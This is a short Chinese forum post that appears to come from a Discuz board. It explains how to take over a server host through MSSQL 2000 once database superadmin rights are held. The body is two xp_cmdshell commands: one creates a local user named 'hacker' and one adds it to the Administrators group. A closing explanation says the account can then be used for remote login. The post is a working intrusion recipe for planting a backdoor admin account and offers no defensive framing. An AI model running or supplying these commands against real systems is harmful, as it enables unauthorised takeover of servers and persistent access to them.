查看: 49|回覆: 0

[入侵防御] 通过MSSQL 2000 入侵服务器主机器的命令

[複製鏈接]

3

主題

0

回帖

0

積分

热心网友

金币
0
閲讀權限
220
精華
0
威望
0
贡献
0
在線時間
0 小時
註冊時間
2011-3-28
發表於 2009-4-13 10:38:54 | 顯示全部樓層 |閲讀模式
首先确保得到数据库超级管理员权限

然后执行如下SQL命令:

1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'



解释:

1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户

2 授权给hacker用户超级管理员权限..

3 这时候您就可以使用创建的帐户去远程登陆这台主机了
回覆

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 立即注册

本版積分規則

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部